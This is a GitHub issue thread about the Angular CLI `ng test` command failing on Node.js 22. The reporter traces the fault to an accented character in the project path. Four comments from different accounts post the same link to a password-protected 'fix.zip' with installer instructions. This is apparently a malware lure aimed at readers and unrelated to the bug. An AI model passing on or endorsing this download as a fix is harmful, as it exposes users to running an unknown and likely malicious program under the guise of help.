### ISSUE TITLE
ng test command broken when using Node.js 22 on version 18.2.0

### ISSUE THREAD

**Issue by MikaStark** [angular/angular-cli#28280]
### Which @angular/* package(s) are the source of the bug?

Don't known / other

### Is this a regression?

Yes

### Description

When using Node.js 22 (e.g. 22.7.0) with angular 18.2.0, `ng command` fails because it cannot find some modules.

You can easily reproduce this behavior by starting a whole new project (`ng new`) and run `ng test` just after. 

### Please provide the exception or error you saw

```true
$ ng test
⠋ Generating browser application bundles (phase: setup)...An unhandled exception occurred: Cannot find module 'source-map-loader'
Require stack:
- /home/mickael-olaria/Développement/ng-hello-world/node_modules/@angular-devkit/build-angular/src/tools/webpack/configs/common.js
- /home/mickael-olaria/Développement/ng-hello-world/node_modules/@angular-devkit/build-angular/src/tools/webpack/configs/index.js
- /home/mickael-olaria/Développement/ng-hello-world/node_modules/@angular-devkit/build-angular/src/builders/karma/index.js
- /home/mickael-olaria/Développement/ng-hello-world/node_modules/@angular-devkit/architect/node/node-modules-architect-host.js
See "/tmp/ng-iPSLTf/angular-errors.log" for further details.
⠋ Generating browser application bundles (phase: setup)...^
```

### Please provide the environment you discovered this bug in (run `ng version`)

```true
Node: 22.7.0
Package Manager: npm 10.8.2
OS: linux x64

Angular: 18.2.1
... animations, cli, common, compiler, compiler-cli, core, forms
... platform-browser, platform-browser-dynamic, router

Package                         Version
---------------------------------------------------------
@angular-devkit/architect       0.1802.1
@angular-devkit/build-angular   18.2.1
@angular-devkit/core            18.2.1
@angular-devkit/schematics      18.2.1
@schematics/angular             18.2.1
rxjs                            7.8.1
typescript                      5.5.4
zone.js                         0.14.10
```

### Anything else?

Worked as expeected with Angular version 18.1.4

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MikaStark** [comment]
@alan-agius4 thanks for the quick answer. Actually I already tried to remove the node_modules folder and the package-lock.json file and reinstall. But it gives the same result.

Maybe itcan be related to my OS. I'm on Ubuntu 24.04, which one do you use ?

**Comment by alan-agius4** [comment]
I highly doubt this is OS related. I am using an internal Linux build.

What is the output of `npm ls source-map-loader`?

**Comment by MikaStark** [comment]
Same as you : 
```sh
npm ls source-map-loader
juripredis-app@4.2.3-rc.3 /home/mickael-olaria/Développement/juripredis-app
└─┬ @angular-devkit/build-angular@18.2.1
  └── source-map-loader@5.0.0
```

**Comment by alan-agius4** [comment]
It seems you're running `npm ls` in the wrong directory. The error indicates that the `node_modules` directory is located at `/home/mickael-olaria/Développement/ng-hello-world`.

**Comment by MikaStark** [comment]
I updated my previous comment, same result anyway

**Comment by alan-agius4** [comment]
Based on this, I’m unsure why `source-map-loader` cannot be resolved since it exists and is in the correct location. From the Angular CLI perspective, we are using a standard `require.resolve` call to handle this library. https://github.com/angular/angular-cli/blob/1ac220d9bca49cedfc6834bf4b066b42764b2ce6/packages/angular_devkit/build_angular/src/tools/webpack/configs/common.ts#L266

Therefore, there's not much more we can do from our end. It might be worth considering a re-installation of Node.js to see if that resolves the issue.

**Comment by MikaStark** [comment]
I will try reinstall node. Thank you for your time @alan-agius4 :)

**Comment by MikaStark** [comment]
Fixed by reinstalling Node.js and clearing cache

**Comment by MikaStark** [comment]
Still not working... I even tried to reinstall nvm and switch to fnm. It seems it started to not working after version 22.3.0. So weird.

**Comment by MikaStark** [comment]
@alan-agius4 I succeeded to make it works by using the workspace @angular/cli instance via `npm run test`. Is there is a possibility my issue is linked to a path issue or something ?

**Comment by MikaStark** [comment]
OMG, found the problem... I'm french... My working directory is "Développement/ng-hello-world", Node.js seems to not like the "é"...
